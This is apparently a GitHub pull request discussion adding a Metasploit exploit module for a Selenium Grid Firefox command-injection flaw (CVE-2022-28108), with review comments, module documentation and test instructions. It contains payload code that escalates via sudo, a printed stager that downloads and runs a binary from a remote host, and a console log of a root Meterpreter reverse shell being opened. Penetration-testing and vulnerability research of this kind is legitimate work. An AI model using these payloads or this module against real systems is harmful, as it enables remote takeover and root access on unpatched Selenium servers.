Add Selenium Firefox RCE module (CVE-2022-28108) #19771
Conversation
modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
| response = http.request(request) | ||
| session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId'] | ||
|
|
||
| sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'" |
There was a problem hiding this comment.
Presumably this will fail unless the user running Selenium can elevate to root (without a password)?
Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.
There was a problem hiding this comment.
Thanks!
When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. 43230b0 Does this approach seem acceptable?
| response = http.request(request) | ||
| session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId'] | ||
|
|
||
| sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'" |
There was a problem hiding this comment.
' and " are bad characters for the payload. This could be avoided by using an additional layer of encoding, such as base64.
There was a problem hiding this comment.
Thanks! I updated it to avoid using single quotes. cb34508
| response = http.request(request) | ||
| session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId'] | ||
|
|
||
| sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'" |
There was a problem hiding this comment.
What is the purpose of the rm -rf $0 here?
There was a problem hiding this comment.
When I replace rm -rf $0 with echo $0 > /tmp/whatisthis, the result of cat /tmp/whatisthis is /tmp/jus1lPj+. The result of cat /tmp/jus1lPj+ is:
echo $0 >/tmp/whatisthis
if sudo -n true 2>/dev/null; then
sudo su root -c 'wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&'
else
wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&
fiWhen I replace echo $0 > /tmp/whatisthis with rm -rf $0, there is no file equivalent to /tmp/jus1lPj+.
So, I believe the purpose of rm -rf $0 is to clean up after the payload.
modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
Show resolved
Hide resolved
* use send_request_cgi * add check if sudo without password possible * base64 encode payload
modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
…2_28108.rb Co-authored-by: bcoles <[email protected]>
There was a problem hiding this comment.
Hello @Takahiro-Yoko,
Thanks for the module! Looks good to me.
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > set rhosts 172.22.186.63
rhosts => 172.22.186.63
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > set lhost 172.22.186.63
lhost => 172.22.186.63
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > set lport 4445
lport => 4445
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > exploit
[*] Started reverse TCP handler on 172.22.186.63:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Started session (289a9847-bc1d-44b7-97f7-4e2b4b6c9ef7).
[*] Meterpreter session 1 opened (172.22.186.63:4445 -> 172.17.0.2:57508) at 2025-01-06 10:37:58 -0500
[*] Failed to delete the session (289a9847-bc1d-44b7-97f7-4e2b4b6c9ef7). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
meterpreter >
meterpreter >
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
Release NotesThis adds an exploit module for Selenium Server (Grid) <= 4.27.0 vulnerable to a Command Injection vulnerability using Firefox as backend. |
One of #19753
Chrome PR: #19769
File read PR: #19781
A bit more unstable compared to Chrome.At least, the number of sessions must be fewer thanmaxSessionsfor the exploit to succeed.Vulnerable Application
Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
The vulnerability affects:
This module was successfully tested on:
Installation
docker pull selenium/standalone-firefox:3.141.59docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59Verification Steps
use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108run lhost=<lhost> rhost=<rhost>Options
TIMEOUT (required)
This is the amount of time (in seconds) that the module will wait for the payload to be
executed. Defaults to 75 seconds.
Scenarios